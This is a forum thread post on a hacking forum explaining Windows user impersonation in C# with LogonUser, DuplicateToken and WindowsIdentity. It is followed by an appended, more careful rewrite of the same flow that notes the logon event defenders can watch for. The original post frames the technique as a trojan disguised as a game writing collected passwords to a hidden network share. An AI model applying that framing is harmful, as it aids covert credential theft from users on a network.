Impersonation with C#

Discussion in 'C#, J#, VB.NET (.NET languages)' started by leflacon47, Mar 26, 2018.

  1. leflacon47 (New Member)

    I'm back on Black Hat ... I guess I already told you. I needed this on a system I wanted to scan, so I wanted to share it here.

    Impersonation is temporarily taking on the authority of a different user. For example, suppose you have a program that must be run by a normal user, but while it is running it needs a different user's privileges for a single operation ... That is when we use impersonation.

    Let me give an example: the trojan you wrote looks like a normal game, but it actually collects information in the background. That information is supposed to be dumped into the \\server\osmanDudugunGizliKlasoru folder, which belongs to your osman.duduk account on the same network and is not visible to other users.

    So what do we do? First we look at the WindowsIdentity class in System.Security.Principal. This class impersonates any user we want as long as it is given an "impersonation" token, and it does all the work.

    Where do we get the token? advapi32.dll. We look at what this Windows DLL offers us. The list is nice .. LogonUser gives us a token. But this is a "logon" token, not an "impersonation" one. Windows is very sensitive in this regard. But thankfully we also have a DuplicateToken function, which can copy such a logon token as an impersonation token.

    So let's get started;

    Note: Learn how P/Invoke works first. I will not copy LogonUser's and DuplicateToken's signatures here; see pinvoke.net:

    Code:
    // Define our tokens.
    IntPtr loginTokeni = IntPtr.Zero, impersonationTokeni = IntPtr.Zero;
    // Let's try. Unexpected errors may occur.
    try {
        // LogonUser returns non-zero if it can log on; DuplicateToken then returns non-zero if it can duplicate the token.
        // The 2 we pass to LogonUser opens an interactive session (LOGON32_LOGON_INTERACTIVE); the 0 says the
        // logon provider is the system default (LOGON32_PROVIDER_DEFAULT). For other session types see pinvoke.net or MSDN.
        // DuplicateToken's 2 (SecurityImpersonation) tells it to clone this token as an impersonation token.
        // <user>, <domain> and <password> are placeholders. LogonUser and DuplicateToken (advapi32.dll) and
        // CloseHandle (kernel32.dll) are the P/Invoke declarations from pinvoke.net, declared with an int return value.
        if (LogonUser(<user>, <domain>, <password>, 2, 0, ref loginTokeni) != 0 && DuplicateToken(loginTokeni, 2, ref impersonationTokeni) != 0) {
            // We immediately create a WindowsIdentity from the impersonation token we made, give it the Impersonate
            // command and keep the result as our impersonation context.
            System.Security.Principal.WindowsImpersonationContext impersonation = new System.Security.Principal.WindowsIdentity(impersonationTokeni).Impersonate();
            // We do the operations we want at this point. For example:
            System.IO.File.WriteAllText("\\\\server\\onlyOsmaninGorduguKlasor\\foundGuarantees.txt", <we found passwords>);
            // Then we leave the impersonation.
            impersonation.Undo();
        }
    } finally {
        // Always closing the token handles we used is good.
        // The function I use is a P/Invoke from kernel32.dll ...
        if (loginTokeni != IntPtr.Zero) CloseHandle(loginTokeni);
        if (impersonationTokeni != IntPtr.Zero) CloseHandle(impersonationTokeni);
    }
    That's it. Good luck with it.
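The LogonUser -> DuplicateToken -> WindowsIdentity.Impersonate flow described in the post, written out as an added example (this is not leflacon47's code) with the P/Invoke declarations included, Win32 error reporting, and a check of which account the thread is running as before, during and after the impersonation. It targets the same .NET Framework API the post uses (WindowsImpersonationContext). The user name, domain, password and the output path are placeholders; the `RunAs` method and `ImpersonationDemo` class are names chosen here. Two points worth knowing when reviewing code like this: impersonation is per thread, so work handed to another thread does not run under the impersonated account, and a LogonUser call with logon type 2 produces a logon event (4624, type Interactive) for the target account in the Security log, which is the trace a defender can look for.

```csharp
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Principal;

static class ImpersonationDemo
{
    const int LOGON32_LOGON_INTERACTIVE = 2;  // the "2" passed to LogonUser in the post
    const int LOGON32_PROVIDER_DEFAULT = 0;   // the "0" passed to LogonUser in the post
    const int SECURITY_IMPERSONATION = 2;     // the "2" passed to DuplicateToken in the post

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LogonUser(string userName, string domain, string password,
                                 int logonType, int logonProvider, out IntPtr token);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool DuplicateToken(IntPtr existingToken, int impersonationLevel, out IntPtr duplicateToken);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr handle);

    // Runs `work` on the current thread under the given account and returns the account name the
    // thread actually ran as, so the caller can verify that the switch happened and was reverted.
    public static string RunAs(string userName, string domain, string password, Action work)
    {
        IntPtr logonToken = IntPtr.Zero, impersonationToken = IntPtr.Zero;
        try
        {
            // A primary (logon) token is not enough for Impersonate(); it must be duplicated first.
            if (!LogonUser(userName, domain, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, out logonToken))
                throw new Win32Exception(Marshal.GetLastWin32Error());   // e.g. 1326 = bad user name or password

            if (!DuplicateToken(logonToken, SECURITY_IMPERSONATION, out impersonationToken))
                throw new Win32Exception(Marshal.GetLastWin32Error());

            // WindowsIdentity duplicates the handle internally, so closing ours in `finally` is safe.
            using (var identity = new WindowsIdentity(impersonationToken))
            using (WindowsImpersonationContext context = identity.Impersonate())
            {
                string runningAs = WindowsIdentity.GetCurrent().Name;
                work();
                return runningAs;
            } // Dispose() reverts the thread to the original identity even if work() throws
        }
        finally
        {
            if (impersonationToken != IntPtr.Zero) CloseHandle(impersonationToken);
            if (logonToken != IntPtr.Zero) CloseHandle(logonToken);
        }
    }

    static void Main()
    {
        string before = WindowsIdentity.GetCurrent().Name;
        // Placeholder credentials and path; replace with an account you are entitled to use.
        string during = RunAs("<user>", "<domain>", "<password>", () =>
            File.WriteAllText(@"C:\Temp\impersonation-check.txt", "written while impersonating"));
        string after = WindowsIdentity.GetCurrent().Name;

        Console.WriteLine("before: " + before);
        Console.WriteLine("during: " + during);   // the impersonated account
        Console.WriteLine("after:  " + after);    // same as `before`
    }
}
```

The `using` blocks replace the explicit `Undo()` call from the post: `WindowsImpersonationContext.Dispose()` calls `Undo()` for you, which matters when the work inside the block throws, since otherwise the thread would keep running as the other account after the exception propagates.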
     
